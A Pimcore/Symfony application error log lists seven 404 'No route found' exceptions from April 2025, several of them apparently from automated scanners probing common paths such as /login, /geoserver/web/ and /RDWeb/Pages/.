[2025-04-23T06:02:00.882755+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET https://35.219.88.188/login"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET https://35.219.88.188/login\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /login HTTP/1.1\r\nAccept:          */*\r\nAccept-Encoding: gzip\r\nHost:            35.219.88.188\r\nUser-Agent:      Mozilla/5.0 zgrab/0.x\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-23T06:50:50.319924+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET https://35.219.88.188/sitemap.xml"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET https://35.219.88.188/sitemap.xml\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /sitemap.xml HTTP/1.1\r\nAccept-Encoding: identity\r\nHost:            35.219.88.188\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-23T06:50:51.254549+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET https://35.219.88.188/.well-known/security.txt"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET https://35.219.88.188/.well-known/security.txt\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /.well-known/security.txt HTTP/1.1\r\nAccept-Encoding: identity\r\nHost:            35.219.88.188\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-23T08:28:24.120609+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET https://35.219.88.188/webui/"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET https://35.219.88.188/webui/\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /webui/ HTTP/1.1\r\nAccept:          */*\r\nAccept-Encoding: gzip\r\nHost:            35.219.88.188\r\nUser-Agent:      Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-23T08:37:58.478649+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET https://35.219.88.188/geoserver/web/"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET https://35.219.88.188/geoserver/web/\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /geoserver/web/ HTTP/1.1\r\nAccept:          */*\r\nAccept-Encoding: gzip\r\nHost:            35.219.88.188\r\nUser-Agent:      Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-23T08:50:55.761519+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET https://35.219.88.188/RDWeb/Pages/"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET https://35.219.88.188/RDWeb/Pages/\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /RDWeb/Pages/ HTTP/1.1\r\nAccept-Encoding: gzip, deflate, br\r\nConnection:      close\r\nHost:            35.219.88.188\r\nUser-Agent:      Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-23T09:53:56.188415+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET https://pimdev.1211.my.id/wordpress/" (from "http://pimdev.1211.my.id/wordpress/")" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET https://pimdev.1211.my.id/wordpress/\" (from \"http://pimdev.1211.my.id/wordpress/\") at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /wordpress/ HTTP/1.1\r\nAccept-Encoding: gzip\r\nHost:            pimdev.1211.my.id\r\nReferer:         http://pimdev.1211.my.id/wordpress/\r\nUser-Agent:      Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
